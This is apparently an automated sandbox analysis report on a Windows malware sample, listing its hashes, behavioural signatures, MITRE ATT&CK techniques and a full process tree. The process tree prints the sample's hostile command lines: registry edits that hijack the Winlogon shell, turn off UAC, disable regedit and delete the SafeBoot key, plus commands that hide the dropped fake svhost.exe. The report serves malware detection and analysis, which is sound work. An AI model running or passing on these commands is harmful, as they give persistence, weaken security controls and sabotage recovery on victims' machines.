Analysis
- max time kernel: 118s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20240708-en
- resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- submitted: 21/09/2024, 00:56
Behavioral task: behavioral1
- Sample: eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe
- Resource: win7-20240708-en
Behavioral task: behavioral2
- Sample: eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe
- Resource: win10v2004-20240802-en
General
- Target: eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe
- Size: 217KB
- MD5: eec4b4c99ef12c3af34dbceb9bba0bd3
- SHA1: 5cdb384dc1b13b32fccb078093b8e7ea25c68053
- SHA256: 980d2ecca216194eb70a3cb502f039589f9a0c2b4fb37392c19144527423ea55
- SHA512: 92b3947cf1296b7fa9a899c4552ac74c406adda9df174155169f957e1c10a68c49dc856edb95ef25de1ea2e3bfa828f5e121415e3f1cb3587e49f89e9d55226b
- SSDEEP: 6144:OQVHddxtFrchQzcp63BkJhysb6PAE30aT:t59tFrcagQMynB
Malware Config
Signatures
- Modifies WinLogon for persistence (2 TTPs, 1 IoCs)
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "C:\\Program Files\\Common Files\\Boot\\svhost.exe" (process: reg.exe)
- UAC bypass
  - Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (process: reg.exe)
- Disables RegEdit via registry modification (1 IoCs)
  - Set value (int): \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (process: reg.exe)
- YARA rule match
  - resource: behavioral1/memory/2032-0-0x0000000000400000-0x0000000000D57000-memory.dmp, yara_rule: upx
- Hide Artifacts: Hidden Files and Directories (1 TTPs, 2 IoCs)
  - PID 2812 cmd.exe
  - PID 1284 cmd.exe
- Drops file in Program Files directory (2 IoCs)
  - File opened for modification: C:\Program Files\Common Files\Boot\svhost.exe (process: attrib.exe)
  - File opened for modification: C:\Program Files\Common Files\Boot (process: attrib.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 18 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Modifies registry key (1 TTPs, 1 IoCs)
  - PID 2060 reg.exe
- Suspicious behavior: RenamesItself (1 IoCs)
  - PID 2732 cmd.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
- Views/modifies file attributes (1 TTPs, 2 IoCs)
  - PID 2192 attrib.exe
  - PID 2896 attrib.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe (PID 2032)
  Command line: "C:\Users\Admin\AppData\Local\Temp\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe"
  Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 2412)
    Command line: "C:\Windows\System32\cmd.exe" /c cmd /c cmd /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe" "C:\Program Files\Common Files\Boot\svhost.exe"
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe (PID 3040)
      Command line: cmd /c cmd /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe" "C:\Program Files\Common Files\Boot\svhost.exe"
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 2732)
        Command line: cmd /c move /y "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\eec4b4c99ef12c3af34dbceb9bba0bd3_JaffaCakes118.exe" "C:\Program Files\Common Files\Boot\svhost.exe"
        Signatures: System Location Discovery: System Language Discovery; Suspicious behavior: RenamesItself
  - C:\Windows\SysWOW64\cmd.exe (PID 3036)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v shell /t reg_sz /d "C:\Program Files\Common Files\Boot\svhost.exe" /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 3028)
      Command line: reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon" /v shell /t reg_sz /d "C:\Program Files\Common Files\Boot\svhost.exe" /f
      Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 1060)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon " /v shell /t reg_sz /d "C:\Program Files\Common Files\Boot\svhost.exe" /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 2880)
      Command line: reg add "hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon " /v shell /t reg_sz /d "C:\Program Files\Common Files\Boot\svhost.exe" /f
      Signatures: Modifies WinLogon for persistence; System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 3016)
    Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 2060)
      Command line: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      Signatures: UAC bypass; System Location Discovery: System Language Discovery; Modifies registry key
  - C:\Windows\SysWOW64\cmd.exe (PID 2780)
    Command line: "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 2756)
      Command line: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
      Signatures: Disables RegEdit via registry modification; System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 1032)
    Command line: "C:\Windows\System32\cmd.exe" /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /f
    Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 2760)
      Command line: reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /f
      Signatures: System Location Discovery: System Language Discovery
  - C:\Windows\SysWOW64\cmd.exe (PID 1284)
    Command line: "C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\Boot\svhost.exe"
    Signatures: Hide Artifacts: Hidden Files and Directories; System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\attrib.exe (PID 2192)
      Command line: attrib +h "C:\Program Files\Common Files\Boot\svhost.exe"
      Signatures: Drops file in Program Files directory; System Location Discovery: System Language Discovery; Views/modifies file attributes
  - C:\Windows\SysWOW64\cmd.exe (PID 2812)
    Command line: "C:\Windows\System32\cmd.exe" /c attrib +h "C:\Program Files\Common Files\Boot"
    Signatures: Hide Artifacts: Hidden Files and Directories; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\attrib.exe (PID 2896)
      Command line: attrib +h "C:\Program Files\Common Files\Boot"
      Signatures: Drops file in Program Files directory; System Location Discovery: System Language Discovery; Views/modifies file attributes
Network
MITRE ATT&CK Enterprise v15
- Privilege Escalation
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
- Defense Evasion
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Hide Artifacts (2): Hidden Files and Directories (2)
  - Impair Defenses (1): Disable or Modify Tools (1)
  - Modify Registry (3)